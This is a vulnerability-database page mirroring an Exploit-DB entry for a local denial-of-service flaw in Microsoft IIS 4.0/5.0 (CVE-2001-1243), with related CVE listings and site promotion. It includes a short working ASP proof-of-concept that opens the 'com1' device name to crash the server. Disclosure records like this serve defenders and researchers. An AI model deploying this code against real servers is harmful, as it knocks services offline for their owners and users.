Lucene search
+L

Microsoft IIS 4.0/5.0 - Device File Local Denial of Service

🗓️ 04 Jul 2001 00:00:00Reported by VIPER_SVType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Microsoft IIS 4.0/5.0 is vulnerable to local denial of service attacks via malicious .asp files.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2001-1243
3 May 200204:00
cve
Cvelist
CVE-2001-1243
3 May 200204:00
cvelist
Exploit DB
Microsoft IIS 4.0/5.0 - Device File Remote Denial of Service
4 Jul 200100:00
exploitdb
EUVD
EUVD-2001-1224
3 May 200204:00
euvd
NVD
CVE-2001-1243
4 Jul 200104:00
nvd
source: https://www.securityfocus.com/bid/2973/info

Microsoft IIS is prone to denial of service attacks by local users. This issue is exploitable if the local attacker can create an .asp file which makes calls to various devices names. The local attacker must of course possess the privileges required to create such files.

The end result of exploiting this vulnerability is that the server will crash and a denial of services will occur. The affected services must be restarted to regain normal functionality.

<%
  Dim strFileName, objFSO, objFile

  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

  strFileName = "com1"

  Set objFile = objFSO.OpenTextFile(strFileName)

  Response.Write objFile.ReadAll

  objFile.Close

%>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.63188
29